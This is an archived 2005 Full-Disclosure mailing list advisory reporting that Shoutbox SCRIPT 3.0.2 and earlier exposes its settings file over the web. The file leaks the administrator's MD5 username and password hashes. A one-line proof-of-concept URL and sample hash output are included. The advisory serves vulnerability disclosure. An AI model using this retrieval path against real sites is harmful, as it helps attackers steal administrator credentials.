[Full-disclosure] Shoutbox SCRIPT <= 3.0.2 Administrative MD5 Username and Password Retrieval

From: CorryL (corryl_at_sitoverde.com)
Date: 04/19/05

  • Next message: Paul Kurczaba: "Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit"
    To: <full-disclosure@lists.grok.org.uk>
    Date: Tue, 19 Apr 2005 23:16:14 +0200
    
    

    -=[--------------------ADVISORY-------------------]=-
    -=[
         ]=-
    -=[ Shoutbox SCRIPT <= 3.0.2 ]=-
    -=[
         ]=-
    -=[ Author: CorryL www.x0n3-h4ck.org ]=-
    -=[
         ]=-
    -=[----------------------------------------------------]=-

    -=[+] Application: Shoutbox SCRIPT
    -=[+] Version: 3.0.2 and prior
    -=[+] Vendor's URL: http://www.knusperleicht.at
    -=[+] Platform: Windows\Linux\Unix
    -=[+] Bug type: Administrative MD5 Username and Password Retrieval
    -=[+] Exploitation: Remote/Local
    -=[-]
    -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
    -=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck

    ..::[ Descriprion ]::..

    shoutbox and' a script very simple php to be used that to install,
    and' used as a glass showcase where the consumers can leave his/her own
    messages

    ..::[ Bug ]::..

    this software and' affection from a bug,
    a remote attacker exploiting the possibility
    has him/it' to draw sensitive information as user and administrator pass in
    md5.

    ..::[ Proof Of Concept ]::..

    http://host/patch to shout/db/settings.dat

    result:

    .....
    ....
    ....
    $SB_ADMIN[Change_Username] = '189bbbb00c5f1fb7fba9ad9285f193d1';
    $SB_ADMIN[Change_Userpass] = '81dc9bdb52d04dc20036dbd8313ed055';

    ..::[ Workaround ]::..

    noting

    ..::[ Disclousure Timeline ]::..

    [17/04/2005] - Vendor notification
    [19/04/2005] - No patch relase from vendor
    [19/04/2005] - Public disclousure

    CorryL
    corryl80@gmail.com
    www.x0n3-h4ck.org
    Italian Security Team
    Fax (+39) 02700520894
    Tel (+39) 06452215277
    irc.xoned.net #x0n3-h4ck

    _________________________________
    www.seekstat.it is your web stat
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/


  • Next message: Paul Kurczaba: "Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit"

    Relevant Pages

    • Re: Cannot connect to postgresql
      ... Apache to php connection is working fine, I tested a couple of trivial ... I have installed PostGreSQL v8. ... I want to install phpBB. ... I tried running this script that I copied from a site ...
      (comp.lang.php)
    • Shoutbox SCRIPT <= 3.0.2 Administrative MD5 Username and Password Retrieval [x0n3-h4ck]
      ... shoutbox and' a script very simple php to be used that to install, ... and' used as a glass showcase where the consumers can leave his/her own ...
      (Bugtraq)
    • Re: Absolute Beginner (Setup Questions)
      ... Everything I've read so far says to start with PHP first. ... Apache is a web-server which you can install freely on your machine. ... processes it (executes the script) and returns some output which then ...
      (comp.lang.php)
    • Re: Absolute Beginner (Setup Questions)
      ... Everything I've read so far says to start with PHP first. ... Apache is a web-server which you can install freely on your machine. ... processes it (executes the script) and returns some output which then ...
      (comp.lang.php)
    • PHP SCRIPT
      ... php classified script ... guestbook ardguest free php guestbook script ... php file upload script ...
      (sci.chem.labware)